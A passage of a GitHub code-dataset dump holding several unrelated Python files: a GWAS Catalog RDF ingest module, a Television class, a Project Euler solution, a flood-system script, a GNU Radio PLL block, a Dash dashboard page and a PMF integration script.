risk_allele_frequency)\n\n self._add_deprecated_snp(\n variant_curie, snp_id_current, merged, chrom_num, chrom_pos)\n\n self._add_snp_gene_relation(\n variant_curie, snp_gene_nums, upstream_gene_num,\n downstream_gene_num)\n elif variant_type == 'haplotype':\n self._process_haplotype(\n variant_curie, strongest_snp_risk_allele, chrom_num,\n chrom_pos, context, risk_allele_frequency, mapped_gene,\n so_ontology)\n elif variant_type is None:\n logger.warning(\n \"There's a snp id i can't manage: %s\",\n strongest_snp_risk_allele)\n continue\n\n description = self._make_description(\n disease_or_trait, initial_sample_description,\n replicate_sample_description,\n platform_with_snps_passing_qc, pvalue)\n\n self._add_variant_trait_association(\n variant_curie, mapped_trait_uri, efo_ontology,\n pubmed_num, description)\n\n if not self.testMode and (\n limit is not None and line_counter > limit):\n break\n\n # TODO loop through the location hash,\n # and make all snps at that location equivalent\n for l in self.id_location_map:\n snp_ids = self.id_location_map[l]\n if len(snp_ids) > 1:\n logger.info(\"%s has >1 snp id: %s\", l, 
str(snp_ids))\n return\n\n def _process_haplotype(\n self, hap_id, hap_label, chrom_num, chrom_pos, context,\n risk_allele_frequency, mapped_gene, so_ontology):\n\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n geno = Genotype(graph)\n model = Model(graph)\n # add the feature to the graph\n hap_description = None\n if risk_allele_frequency != '' and risk_allele_frequency != 'NR':\n hap_description = str(risk_allele_frequency) + ' [risk allele frequency]'\n\n model.addIndividualToGraph(\n hap_id, hap_label.strip(), self.globaltt['haplotype'], hap_description)\n geno.addTaxon(self.globaltt[\"Homo sapiens\"], hap_id)\n\n snp_labels = re.split(r';\\s?', hap_label)\n chrom_nums = re.split(r';\\s?', chrom_num)\n chrom_positions = re.split(r';\\s?', chrom_pos)\n context_list = re.split(r';\\s?', context)\n mapped_genes = re.split(r';\\s?', mapped_gene)\n snp_curies = list()\n\n for index, snp in enumerate(snp_labels):\n snp_curie, snp_type = self._get_curie_and_type_from_id(snp)\n if snp_type is None:\n # make blank node\n snp_curie = self.make_id(snp, \"_\")\n\n graph.addTriple(hap_id, self.globaltt['has_variant_part'], snp_curie)\n snp_curies.append(snp_curie)\n\n # courtesy http://stackoverflow.com/a/16720915\n length = len(snp_labels)\n if not all(len(lst) == length\n for lst in [chrom_nums, chrom_positions, context_list]):\n logger.warning(\n \"Unexpected data field for haplotype {} \\n \"\n \"will not add snp details\".format(hap_label))\n return\n\n variant_in_gene_count = 0\n for index, snp_curie in enumerate(snp_curies):\n self._add_snp_to_graph(\n snp_curie, snp_labels[index], chrom_nums[index],\n chrom_positions[index], context_list[index])\n\n if len(mapped_genes) == len(snp_labels):\n so_class = self.resolve(context_list[index])\n # removed the '+' for recursive one-or-more rdfs:subClassOf paths\n # just so it did not return an empty graph \n so_query = \"\"\"\nSELECT ?variant_label\n WHERE {{\n {0} rdfs:subClassOf {1} ;\n rdfs:label ?variant_label .\n }}\n \"\"\".format(so_class, self.globaltt['gene_variant'])\n\n query_result = so_ontology.query(so_query)\n\n if len(list(query_result)) == 1:\n gene_id = DipperUtil.get_ncbi_id_from_symbol(mapped_genes[index])\n\n if gene_id is not None:\n geno.addAffectedLocus(snp_curie, gene_id)\n geno.addAffectedLocus(hap_id, gene_id)\n variant_in_gene_count += 1\n\n gene_id = DipperUtil.get_ncbi_id_from_symbol(mapped_genes[index])\n if gene_id is not None:\n graph.addTriple(\n snp_curie, self.resolve(context_list[index]), gene_id)\n\n else:\n logger.warning(\n \"More mapped genes than snps, cannot disambiguate for {}\"\n .format(hap_label))\n\n # Seperate in case we want to apply a different relation\n # If not this is redundant with triples added above\n if len(mapped_genes) == variant_in_gene_count and len(set(mapped_genes)) == 1:\n gene_id = DipperUtil.get_ncbi_id_from_symbol(mapped_genes[0])\n geno.addAffectedLocus(hap_id, gene_id)\n\n return\n\n def _add_snp_to_graph(\n self, snp_id, snp_label, chrom_num, chrom_pos, context,\n risk_allele_frequency=None):\n\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n model = Model(graph)\n\n if chrom_num != '' and chrom_pos != '':\n location = self._make_location_curie(chrom_num, chrom_pos)\n if location not in self.id_location_map:\n self.id_location_map[location] = set()\n else:\n location = None\n\n alteration = re.search(r'-(.*)$', snp_id)\n if alteration is not None and re.match(r'[ATGC]', alteration.group(1)):\n # add variation to snp\n pass # 
TODO\n\n if location is not None:\n self.id_location_map[location].add(snp_id)\n\n # create the chromosome\n chrom_id = makeChromID(chrom_num, self.localtt['reference assembly'], 'CHR')\n\n # add the feature to the graph\n snp_description = None\n if risk_allele_frequency is not None\\\n and risk_allele_frequency != ''\\\n and risk_allele_frequency != 'NR':\n snp_description = str(risk_allele_frequency) + ' [risk allele frequency]'\n\n feat = Feature(\n graph, snp_id, snp_label.strip(), self.globaltt['SNP'], snp_description)\n if chrom_num != '' and chrom_pos != '':\n feat.addFeatureStartLocation(chrom_pos, chrom_id)\n feat.addFeatureEndLocation(chrom_pos, chrom_id)\n feat.addFeatureToGraph()\n feat.addTaxonToFeature(self.globaltt['Homo sapiens'])\n # TODO consider adding allele frequency as property;\n # but would need background info to do that\n\n # also want to add other descriptive info about\n # the variant from the context\n for c in re.split(r';', context):\n c = c.strip()\n cid = self.resolve(c, False)\n if cid != c:\n model.addType(snp_id, cid)\n\n return\n\n def _add_deprecated_snp(\n self, snp_id, snp_id_current, merged, chrom_num, chrom_pos):\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n model = Model(graph)\n location = self._make_location_curie(chrom_num, chrom_pos)\n # add deprecation information\n if merged == '1' and str(snp_id_current.strip()) != '':\n # get the current rs_id\n current_rs_id = 'dbSNP:'\n if not re.match(r'rs', snp_id_current):\n current_rs_id += 'rs'\n current_rs_id += str(snp_id_current)\n if location is not None:\n if location not in self.id_location_map:\n self.id_location_map[location] = set(current_rs_id)\n else:\n self.id_location_map[location].add(current_rs_id)\n model.addDeprecatedIndividual(snp_id, current_rs_id)\n # TODO check on this\n # should we add the annotations to the current\n # or orig?\n model.makeLeader(current_rs_id)\n else:\n model.makeLeader(snp_id)\n\n def _add_snp_gene_relation(\n self, snp_id, snp_gene_nums, upstream_gene_num, downstream_gene_num):\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n geno = Genotype(graph)\n # add the feature as a sequence alteration\n # affecting various genes\n # note that intronic variations don't necessarily list\n # the genes such as for rs10448080 FIXME\n if snp_gene_nums != '':\n for geneid in re.split(r',', snp_gene_nums):\n geneid = geneid.strip()\n # still have to test for this,\n # because sometimes there's a leading comma\n if geneid != '':\n geno.addAffectedLocus(snp_id, 'NCBIGene:' + geneid)\n\n # add the up and downstream genes if they are available\n if upstream_gene_num != '':\n downstream_gene_id = 'NCBIGene:' + downstream_gene_num\n graph.addTriple(\n snp_id, self.globaltt['is upstream of sequence of'], downstream_gene_id)\n if downstream_gene_num != '':\n upstream_gene_id = 'NCBIGene:' + upstream_gene_num\n graph.addTriple(\n snp_id, self.globaltt['is downstream of sequence of'], upstream_gene_id)\n\n def _add_variant_trait_association(\n self, variant_id, mapped_trait_uri, efo_ontology, pubmed_id,\n description=None):\n if self.testMode:\n graph = self.testgraph\n else:\n graph = self.graph\n model = Model(graph)\n # make associations to the EFO terms; there can be >1\n if mapped_trait_uri.strip() != '':\n for trait in re.split(r',', mapped_trait_uri):\n trait = trait.strip()\n\n trait_curie = trait.replace(\"http://www.ebi.ac.uk/efo/EFO_\", \"EFO:\")\n\n phenotype_query = \"\"\"\n SELECT ?trait\n WHERE {{\n <{0}> 
rdfs:subClassOf+ .\n <{0}> rdfs:label ?trait .\n }}\n \"\"\".format(trait)\n\n query_result = efo_ontology.query(phenotype_query)\n if len(list(query_result)) > 0:\n if re.match(r'^EFO', trait_curie):\n model.addClassToGraph(\n trait_curie, list(query_result)[0][0],\n self.globaltt['Phenotype'])\n\n pubmed_curie = 'PMID:' + pubmed_id\n\n ref = Reference(\n graph, pubmed_curie, self.globaltt['journal article'])\n ref.addRefToGraph()\n\n assoc = G2PAssoc(\n graph, self.name, variant_id, trait_curie,\n model.globaltt['contributes to condition'])\n assoc.add_source(pubmed_curie)\n\n assoc.add_evidence(\n self.globaltt['combinatorial evidence used in automatic assertion'])\n\n if description is not None:\n assoc.set_description(description)\n\n # FIXME score should get added to provenance/study\n # assoc.set_score(pvalue)\n if trait_curie is not None:\n assoc.add_association_to_graph()\n\n @staticmethod\n def _make_location_curie(chrom_num, chrom_pos):\n return 'chr' + str(chrom_num) + ':' + str(chrom_pos)\n\n @staticmethod\n def _make_description(\n disease_or_trait, initial_sample_description, replicate_sample_description,\n platform_with_snps_passing_qc, pvalue):\n description = 'A study of '+disease_or_trait+' in '+initial_sample_description\n if replicate_sample_description != '':\n description = ' '.join(\n (description, 'with', replicate_sample_description))\n if platform_with_snps_passing_qc != '':\n description = ' '.join(\n (description, 'on platform', platform_with_snps_passing_qc))\n description = ' '.join((description, '(p=' + pvalue + ')'))\n return description\n\n @staticmethod\n def _get_curie_and_type_from_id(variant_id):\n \"\"\"\n Given a variant id, our best guess at its curie\n and type (snp, haplotype, etc)\n None will be used for both curie and type\n for IDs that we can't process\n :param variant_id:\n :return:\n \"\"\"\n curie = None\n variant_type = None\n\n # remove space before hyphens\n variant_id = re.sub(r' -', '-', variant_id)\n if re.search(r' x ', variant_id) or re.search(r',', variant_id):\n # TODO deal with rs1234 x rs234... 
(haplotypes?)\n logger.warning(\"Cannot parse variant groups of this format: %s\", variant_id)\n elif re.search(r';', variant_id):\n curie = ':haplotype_' + Source.hash_id(variant_id)\n variant_type = \"haplotype\"\n elif re.match(r'rs', variant_id):\n curie = 'dbSNP:' + variant_id.strip()\n curie = re.sub(r'-.*$', '', curie).strip()\n variant_type = \"snp\"\n # remove the alteration\n elif re.match(r'kgp', variant_id):\n # http://www.1000genomes.org/faq/what-are-kgp-identifiers\n curie = ':kgp-' + variant_id.strip()\n variant_type = \"snp\"\n elif re.match(r'chr', variant_id):\n # like: chr10:106180121-G\n #\n variant_id = re.sub(r'-?', '-N', variant_id)\n variant_id = re.sub(r' ', '', variant_id)\n curie = ':gwas-' + re.sub(r':', '-', variant_id.strip())\n variant_type = \"snp\"\n elif variant_id.strip() == '':\n pass\n else:\n logger.warning(\"There's a snp id i can't manage: %s\", variant_id)\n\n return curie, variant_type\n","repo_name":"alexgarciac/dipper","sub_path":"dipper/sources/GWASCatalog.py","file_name":"GWASCatalog.py","file_ext":"py","file_size_in_byte":21601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"1476792546","text":"class Television:\n \"\"\"\n A class representing details for a television object.\n \"\"\"\n MIN_CHANNEL = 0 # Minimum TV channel\n MAX_CHANNEL = 3 # Maximum TV channel\n\n MIN_VOLUME = 0 # Minimum TV volume\n MAX_VOLUME = 2 # Maximum TV volume\n\n def __init__(self) -> None:\n \"\"\"\n Contstructor to create initial state for television object.\n Creates private variables for channel, volume, and power state.\n Channel and volume variables are initialized at the minimum value, power is set to be off (0).\n \"\"\"\n self.__channel = Television.MIN_CHANNEL\n self.__volume = Television.MIN_VOLUME\n self.__on = 0\n\n def power(self) -> None:\n \"\"\"\n Method to toggle the power state of the television object.\n Sets the power to on (1) if off (0), and off if on.\n \"\"\"\n if self.__on == 1:\n self.__on = 0\n else:\n self.__on = 1\n\n def channel_up(self) -> None:\n \"\"\"\n Method to increase the channel value of the television object by 1.\n Increasing the value while at the max value will cycle the channel back to the min value.\n \"\"\"\n if self.__on == 1:\n if self.__channel + 1 > Television.MAX_CHANNEL:\n self.__channel = Television.MIN_CHANNEL\n else:\n self.__channel += 1\n\n def channel_down(self) -> None:\n \"\"\"\n Method to decrease the channel value of the television object by 1.\n Decreasing the value while at the min value will cycle the channel back to the max value.\n \"\"\"\n if self.__on == 1:\n if self.__channel - 1 < Television.MIN_CHANNEL:\n self.__channel = Television.MAX_CHANNEL\n else:\n self.__channel -= 1\n\n def volume_up(self) -> None:\n \"\"\"\n Method to increase the volume value of the television object by 1.\n Increasing the value while at the max value will cause no change.\n \"\"\"\n if self.__on == 1:\n if self.__volume + 1 <= Television.MAX_VOLUME:\n self.__volume += 1\n\n def volume_down(self) -> None:\n \"\"\"\n Method to decrease the volume value of the television object by 1.\n Decreasing the value while at the min value will cause no change.\n \"\"\"\n if self.__on == 1:\n if self.__volume - 1 >= Television.MIN_VOLUME:\n self.__volume -= 1\n\n def __str__(self) -> str:\n \"\"\"\n Method to retrieve the power, channel, and volume status of the television object.\n :return: Power state (True/False), channel number, and volume number.\n \"\"\"\n power_status = 
''\n if self.__on:\n power_status = 'True'\n else:\n power_status = 'False'\n status = 'TV status: Is on = {}, Channel = {}, Volume = {}'\n return status.format(power_status, self.__channel, self.__volume)\n","repo_name":"KianuB/lab","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27872799349","text":"\"\"\"Largest prime factor\nProblem:The prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143 ?\n\"\"\"\ndef is_prime(num):\n if num <= 3:\n if num <= 1:\n return False\n return True\n \n if not num%2 or not num%3:\n return False\n \n for i in range(5, int(num**0.5) + 1, 6):\n if not num%i or not num%(i + 2):\n return False\n return True\n\ndef get_largest_prime(value):\n for x in range(2, int(value**0.5) + 1):\n if not value % x:\n yield x\n while not value % x:\n value //= x\n if value > 1:\n yield value # a prime cofactor > sqrt(value) is the largest factor\n\n\nif __name__=='__main__':\n print('test 13195')\n test = list(get_largest_prime(13195))\n assert test[-1]==29,'The largest prime of 13195, should be 29, got [%s]' % test\n print(test)\n print('Pass Test')\n\n print('largest prime factor of number 600851475143')\n value = list(get_largest_prime(600851475143))\n print(value)\n","repo_name":"Shaunwei/ProjectEuler","sub_path":"problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33078371860","text":"from floodsystem.stationdata import build_station_list\nfrom floodsystem.station import MonitoringStation\n\ndef run():\n \"\"\"Requirements for Task 1F\"\"\"\n\n # Build list of stations\n stations = build_station_list()\n rivers_sorted = MonitoringStation.inconsistent_typical_range_stations(stations)\n print(f\"number of stations with inconsistent data: {len(rivers_sorted)}\")\n print(f\"stations with inconsistent data: {rivers_sorted}\")\n\n\n\nif __name__ == \"__main__\":\n print(\"*** Task 1F: CUED Part IA Flood Warning System ***\")\n run()\n\n","repo_name":"emmamunday/flood-risk-project","sub_path":"Task1F.py","file_name":"Task1F.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20652831456","text":"import numpy as np\nfrom gnuradio import gr, digital\n\nclass blk(gr.sync_block): # other base classes are basic_block, decim_block, interp_block\n \"\"\"\n Decision Directed PLL - Decision Directed based carrier recovery pll\n\n Parameters:\n bw - Loop Bandwidth (default = 2*pi/100)\n damp - Loop Damping (default = 1.0)\n const - Slicer Constellation (default = BPSK)\n \"\"\"\n\n def __init__(self, bw=0.0628, damp=1.0, const=digital.bpsk_constellation()): # only default arguments here\n \"\"\"arguments to this function show up as parameters in GRC\"\"\"\n gr.sync_block.__init__(\n self,\n name='Decision Directed PLL', # will show up in GRC\n in_sig=[np.complex64],\n out_sig=[np.complex64, np.float32]\n )\n self.bw = bw\n self.damp = damp\n\n self.phase = 0\n self.freq = 0\n self.prevgains = [0,0]\n self.slicer_const = np.array(const.points()) # as an ndarray so vectorized ops in Decision() work\n\n self.denom = (len(self.slicer_const) + 2 * self.damp * self.bw + self.bw * self.bw)\n self.alpha = (4 * self.damp * self.bw) / self.denom\n self.beta = (4 * self.bw * self.bw) / self.denom\n\n def Decision(self, symbol):\n return self.slicer_const[np.argmin(np.abs(self.slicer_const - symbol))]\n\n def updateGains(self):\n 
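# Added commentary (assumption, not in the original source): these gains
# appear to follow the standard second-order PLL loop-filter design, with
# alpha = 4*zeta*bw/denom as the proportional (phase) gain and
# beta = 4*bw^2/denom as the integral (frequency) gain, where zeta is the
# damping factor and denom normalizes by the constellation size plus
# 2*zeta*bw + bw^2. updateGains() recomputes them whenever work() detects
# that bw or damp changed at runtime.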
self.denom = (len(self.slicer_const) + 2 * self.damp * self.bw + self.bw * self.bw) \n self.alpha = (4 * self.damp * self.bw) / self.denom\n self.beta = (4 * self.bw * self.bw) / self.denom\n self.phase = 0\n self.freq = 0\n\n def work(self, input_items, output_items):\n inputs = input_items[0]\n outputs = output_items[0]\n errors = output_items[1]\n\n if(self.prevgains[0] != self.bw or self.prevgains[1] != self.damp):\n self.prevgains = [self.bw*1, self.damp*1]\n self.updateGains()\n\n for i in range(len(inputs)):\n out = inputs[i] * np.exp(-1j*self.phase)\n error = (out * np.conj(self.Decision(out))).imag\n self.freq += self.beta * error\n self.phase += self.freq + self.alpha * error\n self.phase = (np.pi + self.phase) % (2*np.pi) - np.pi\n outputs[i] = out\n errors[i] = error\n return len(outputs)\n","repo_name":"Paulo-D2000/Gr-DDPLL","sub_path":"Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"10618267970","text":"import dash\nfrom dash import dash_table as dt\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom dash import html, dcc, Input, Output, callback\nimport pandas as pd\n\n# Create the Dash application\n\ndash.register_page(__name__, name='Municipio')\ntitle = 'Municipio'\n\n# Load your data from a file (make sure 'Data.xlsx' is in the same directory)\ndf = pd.read_excel('Data.xlsx')\n\n# Add a Dropdown to select the year\nlayout = html.Div([\n html.Div([\n html.H1('ANUIES DASH'),\n html.Img(src='assets/municipios.png')\n ], className='banner'),\n\n html.Div([\n html.Div([\n html.Div([\n html.H3('Estados de México', style={\n 'margin-bottom': '8px', 'color': 'black'}),\n ])\n ], className='create_container1 four columns', id=\"title\"),\n ], id=\"header\", className=\"row flex-display\", style={'margin-bottom': \"25px\"}),\n\n # Dropdown list (state) to show its corresponding municipalities\n html.Div([\n html.Div([\n html.P('Selecciona el estado', className='fix_label',\n style={'color': 'black', 'text-align': 'center'}),\n dcc.Dropdown(\n id='select_estados',\n multi=False,\n clearable=True,\n disabled=False,\n style={'display': True},\n value='AGUASCALIENTES',\n placeholder='Selecciona Estado',\n options=[{'label': c, 'value': c}\n for c in df['ENTIDAD_FEDERATIVA'].unique()],\n className=\"dcc_compon\"\n ),\n\n # Add a Dropdown to select the year\n html.P('Selecciona el año', className='fix_label',\n style={'color': 'black', 'text-align': 'center'}),\n dcc.Dropdown(\n id='select_anio',\n multi=False,\n clearable=True,\n disabled=False,\n style={'display': True},\n value=2022, # Adjust this to the actual years in your DataFrame\n placeholder='Selecciona Año',\n options=[{'label': anio, 'value': anio}\n for anio in df['Año'].unique()],\n className=\"dcc_compon\"\n )\n ], className='create_container1 four columns', style={'margin-bottom': '8px'})\n ], className=\"row flex-display\"),\n\n # Data Table\n html.Div([\n html.Div([\n dt.DataTable(\n id='my_datatable',\n columns=[{'name': c, 'id': c} for c in df.columns],\n page_current=0,\n page_size=10,\n page_action='custom',\n ),\n ], className='create_container2 thirteen columns'),\n ], className='row flex-display'),\n\n # Bar chart with the sum of variables per municipality\n html.Div([\n html.Br(),\n dcc.Graph(id='bar_chartM',\n config={'displayModeBar': 'hover'})\n ], className='create_container2 thirteen columns'),\n\n # Line 
chart with the sum of variables per municipality\n html.Div([\n html.Br(),\n dcc.Graph(id='line_chartM',\n config={'displayModeBar': 'hover'})\n ], className='create_container2 thirteen columns'),\n\n # Create the pie charts in groups of two\n html.Div([\n # First row of pie charts\n html.Div([\n html.Br(),\n dcc.Graph(id='pie_chartM', config={'displayModeBar': 'hover'}),\n html.Br(),\n\n dcc.Graph(id='pie_chartM1', config={'displayModeBar': 'hover'}),\n ],className='create_container seven columns'),\n html.Br(),\n\n # Second row of pie charts\n html.Div([\n html.Br(),\n dcc.Graph(id='pie_chartM2', config={'displayModeBar': 'hover'}),\n html.Br(),\n\n dcc.Graph(id='pie_chartM3', config={'displayModeBar': 'hover'}),\n ], className='create_container six columns'),\n\n # Third row of pie charts\n html.Div([\n html.Br(),\n dcc.Graph(id='pie_chartM4', config={'displayModeBar': 'hover'}),\n html.Br(),\n\n dcc.Graph(id='pie_chartM5', config={'displayModeBar': 'hover'}),\n ], className='create_container five columns'),\n ], className='row flex-display'),\n\n])\n\n# Update your callbacks to include the selected year\n@callback(\n [Output('my_datatable', 'data'),\n Output('bar_chartM', 'figure'),\n Output('line_chartM', 'figure'),\n Output('pie_chartM', 'figure'),\n Output('pie_chartM1', 'figure'),\n Output('pie_chartM2', 'figure'),\n Output('pie_chartM3', 'figure'),\n Output('pie_chartM4', 'figure'),\n Output('pie_chartM5', 'figure')],\n [Input('select_estados', 'value'), Input('select_anio', 'value')]\n)\ndef update_data(select_estados, select_anio):\n # Filter the data by the selected state and year\n filtered_data = df[(df['ENTIDAD_FEDERATIVA'] == select_estados)\n & (df['Año'] == select_anio)]\n\n # Update the Data Table\n data_table = filtered_data.to_dict('records')\n\n # Variables to show in the charts\n variables = ['Lugares_Ofertados', 'Solicitudes_de_Primer_Ingreso', 'Primer_Ingreso_Total',\n 'Matrícula_Total', 'Egresados_Total', 'Titulados_Total']\n\n # Compute the sum of each variable per municipality\n variable_sums = filtered_data.groupby('MUNICIPIO')[variables].sum().reset_index()\n\n bar_data = []\n line_data = []\n\n for variable in variables:\n # Bar chart\n bar_data.append(\n go.Bar(\n x=variable_sums['MUNICIPIO'],\n y=variable_sums[variable],\n name=variable,\n text=variable_sums[variable],\n textposition='inside'\n )\n )\n\n # Line chart\n line_data.append(\n go.Scatter(\n x=variable_sums['MUNICIPIO'],\n y=variable_sums[variable],\n mode='lines+markers',\n name=variable,\n text=variable_sums[variable],\n textposition='top center'\n )\n )\n\n bar_fig = go.Figure(data=bar_data)\n bar_fig.update_layout(\n barmode='group',\n title=f'Suma de Variables por Municipio de {select_estados}',\n xaxis_title='Municipio',\n yaxis_title='Suma',\n yaxis=dict(title=\"Suma\")\n )\n\n line_fig = go.Figure(data=line_data)\n line_fig.update_layout(\n title=f'Suma de Variables por Municipio de {select_estados} (Gráfico Lineal)',\n xaxis_title='Municipio',\n yaxis_title='Suma'\n )\n\n # Create pie charts with Plotly Express for all variables\n pie_data_variables = []\n\n for variable in variables:\n # Set the pie chart title\n pie_title = f'Distribución de {variable} en {select_estados}'\n pie_data = px.pie(filtered_data, names='MUNICIPIO', values=variable, title=pie_title)\n pie_data_variables.append(pie_data)\n\n pie_chartM = pie_data_variables[0]\n pie_chartM1 = pie_data_variables[1]\n pie_chartM2 = 
pie_data_variables[2]\n pie_chartM3 = pie_data_variables[3]\n pie_chartM4 = pie_data_variables[4]\n pie_chartM5 = pie_data_variables[5]\n\n return data_table, bar_fig, line_fig, pie_chartM, pie_chartM1, pie_chartM2, pie_chartM3, pie_chartM4, pie_chartM5\n\n\n","repo_name":"sergiopechtorres/APP-DASH-WEB","sub_path":"pages/Municipio.py","file_name":"Municipio.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22441848150","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 10 22:23:14 2020\n\n@author: Arriën Symon Rauh\n\"\"\"\nimport os\nimport OsTools3 as ot\nimport sys\nimport argparse\nimport pandas as pd\nimport numpy as np\n#import scipy as sp\nimport matplotlib.pyplot as plt\nimport math\n\n\ndistances = [2.5 , 2.55, 2.6 , 2.65, 2.7 , 2.75, 2.8 , 2.85, 2.9 , 2.95, 3.0 ,\n 3.1 , 3.2 , 3.3 , 3.4 , 3.5 , 3.6 , 3.7 , 3.8 , 3.9 , 4.0 , 4.2 ,\n 4.4 , 4.6 , 4.8 , 5.0]\n\ndef read_data(data_file):\n \"\"\"\n Read tab-separated constraint-force data into a DataFrame.\n \"\"\"\n data = pd.read_csv(data_file, sep='\\t')\n return data\n\n\ndef blocked(forces, nblocks):\n \"\"\"\n Performs block averaging.\n\n Parameters\n ----------\n forces : dataFrame\n The data to calculate an average over.\n nblocks : integer\n Number of blocks to separate the data into.\n \"\"\"\n size = len(forces)/nblocks\n blocks = []\n for block in range(nblocks):\n a = []\n for ts in forces[int(block*size):int((block+1)*size)]:\n a.append(ts)\n blocks.append(np.average(a))\n blockaverage = np.average(blocks)\n blockstd = np.std(blocks)\n blockvar = np.var(blocks)\n return nblocks, size, blockaverage, blockstd, blockvar\n\n\ndef deltaG_off(pmf):\n \n dGoff = pmf.min() - pmf[pmf.argmin():].max()\n \n return dGoff\n\n\n\ndef mean_force_dist(forces, r):\n \"\"\"\n Extract the mean force\n \"\"\"\n # Calculate mean per distance\n F_mean = blocked(forces, 100)[2]#-np.average(forces)\n # Estimate the error through block averaging *NEEDS CHECKING*\n F_mean_error = blocked(forces, 100)[3]# Block averaging\n return [r, F_mean, F_mean_error]\n\n\ndef mean_force(data):\n \"\"\"\n Compute the block-averaged mean force for every sampled COM distance.\n \"\"\"\n # Calculate mean per distance\n mean_force_per_distance = []\n for r in np.sort(data.com_dist.unique()):\n forces_r = data.loc[data['com_dist'] == r, 'force']\n mean_force_per_distance.append(mean_force_dist(forces_r, r))\n# print(r, mean_force_per_distance[-1][0])\n return mean_force_per_distance\n\n\ndef mf_w_entropy_corr(mf,kB,T):\n \"\"\"\n Performs entropy correction.\n \"\"\"\n mf_corr = []\n for d in mf:\n mf_corr.append([d[0],d[1]+(2.0*T*kB/d[0]),d[2]])\n return mf_corr\n\ndef calculate_pmf(mf,mf_corr):\n \"\"\"\n Calculates the PMF by numerically integrating the mean force.\n \"\"\"\n pmf_of_d = []\n # Weights??\n w = []\n\n for d in mf:\n pmf_of_d.append([d[0],0.0,0.0])\n w.append(0.0)\n\n pmf_of_d[-1][1] = 0.0\n for i in reversed(range(len(mf_corr)-1)):\n # Weights to account for distance between COM-constraints\n hh = 0.5*(mf[i+1][0]-mf[i][0])\n #\n pmf_of_d[i][1] = pmf_of_d[i+1][1] - hh*(mf_corr[i+1][1]+mf_corr[i][1])\n# print(pmf_of_d[i][1], \" = \", pmf_of_d[i+1][1],\" - \" , hh*(mf_corr[i+1][1]+mf_corr[i][1]))\n\n w[i] += hh\n w[i+1] += hh\n\n pmf_of_d[-1][2] = 0.0\n# print(w, mf_corr)\n var_int = math.pow(w[-1]*mf_corr[-1][2],2)\n\n for i in reversed(range(len(mf_corr)-1)):\n hh = 0.5*(mf[i+1][0]-mf[i][0])\n pmf_of_d[i][2] = var_int + math.pow(hh*mf_corr[i][2],2)\n var_int += math.pow(w[i]*mf_corr[i][2],2)\n\n for i in range(len(pmf_of_d)):\n 
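# Added commentary (not in the original source): the backward loop above
# propagates the block-averaged force errors through the trapezoidal
# integration as variances (sums of squared, weighted errors); this final
# loop takes the square root so pmf_of_d[i][2] becomes a standard-deviation
# error bar for the integrated PMF at each COM distance.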
pmf_of_d[i][2] = math.sqrt(pmf_of_d[i][2])\n\n return pmf_of_d\n\n\ndef output_pmf(pmf, output_file):\n \"\"\"\n \"\"\"\n pmf.to_csv(output_file, sep='\\t', index=False, float_format='%.7f')\n # with open(output_file,'w') as of:\n # for i in range(0,len(pmf)):\n # of.write(F\"{pmf[i,0]}'\\t'{pmf[i,1]}'\\t'{pmf[i,2]}\\n\")\n\n\ndef plot_pmf(pmf, png_file):\n \"\"\"\n \"\"\"\n plt.plot(pmf[:,0],pmf[:,1])\n plt.xlabel(\"COM distance (nm)\")\n plt.ylabel(r\"PMF (F $(kJ mol^{-1})$\")\n plt.title(F\"{png_file.split('.')[-2].split('/')[-1].replace('_', ' ')}\")\n plt.savefig(png_file, dpi=300)\n plt.close()\n\n\ndef constraint_force_integration(data_file, output_file, png_file, ret=False):\n \"\"\"\n Perfoms the constraint force integration.\n \"\"\"\n if type(data_file) == type(pd.DataFrame()):\n data = data_file\n elif os.path.isfile(data_file):\n data = read_data(data_file)\n try:\n # Calculate mean force for every distance\n mean_forces = mean_force(data)\n except NameError:\n print(\"Data Error: data input needs to be checked.\")\n sys.exit(1)\n # Definitions of constants\n kB = 8.31451e-3\n T = 303\n # Calculate correction of mean forces\n mf_corr = mf_w_entropy_corr(mean_forces,kB,T)\n # Calculate the PMF\n pmf = np.array(calculate_pmf(mean_forces,mf_corr))\n df_pmf = pd.DataFrame({'com_dist':pmf[:,0], 'pmf':pmf[:,1], 'error':pmf[:,2]})\n\n # Check output directory\n if not os.path.isdir(ot.file_path(output_file)):\n os.makedirs(ot.file_path(output_file))\n # Write PMF data to file\n output_pmf(df_pmf, output_file)\n # Write plot to file\n if png_file:\n plot_pmf(pmf, png_file)\n if ret:\n return df_pmf\n\n\ndef main(data_file, output_file, png_file):\n \"\"\"\n \"\"\"\n constraint_force_integration(data_file, output_file, png_file)\n\n\n#############MAIN##############\nif __name__ == \"__main__\":\n \"Do the work\"\n # Parse command line arguments\n parser = argparse.ArgumentParser(description=\n '''This script prodcues a PMF from pull\n forces''')\n parser.add_argument(\"-i\", \"--data_file\", help=\"\", required=True)\n parser.add_argument(\"-o\", \"--output_file\", help=\"\", required=False)\n parser.add_argument(\"-p\", \"--plot_pmf\", dest=\"plot_pmf\", action=\"store_true\",\n help='''For including a plot of the pmf''')\n\n args = parser.parse_args()\n data_file = args.data_file\n output_file = args.output_file\n png_file = args.plot_pmf\n\n main(data_file, output_file, 